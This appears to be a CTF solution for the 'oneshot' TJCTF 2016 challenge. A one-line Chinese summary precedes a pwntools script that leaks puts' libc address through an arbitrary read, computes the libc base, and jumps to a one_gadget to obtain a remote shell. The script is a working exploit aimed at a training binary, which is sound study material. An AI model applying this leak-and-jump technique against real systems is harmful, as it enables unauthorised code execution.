简单题,容易想到先泄漏libc基址,然后jump to onegadget 从而getshell
from pwn import *
'''
author: lemon
time: 2020-10-26
libc: libc-2.23.so
python version: 2
'''
local = 0
binary = "./oneshot_tjctf_2016"
libc_path = './libc-2.23.so'
port = "25643"
if local == 1:
p = process(binary)
else:
p = remote("node3.buuoj.cn",port)
def dbg():
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
elf = ELF(binary)
libc = ELF(libc_path)
puts_got = elf.got['puts']
dbg()
p.recvuntil('Read location?')
p.sendline(str(puts_got))
# puts_addr = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00'))
p.recvuntil('0x0000')
puts_addr = int(p.recv(12),16)
print "puts address : ",hex(puts_addr)
libc_base = puts_addr - libc.sym['puts']
onegadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]
print "[*] libc_base:",hex(libc_base)
onegadgegt = libc_base + onegadget_list[3]
p.recvuntil('Jump location?')
payload = onegadgegt
p.sendline(str(payload))
# gdb.attach(p)
p.interactive()
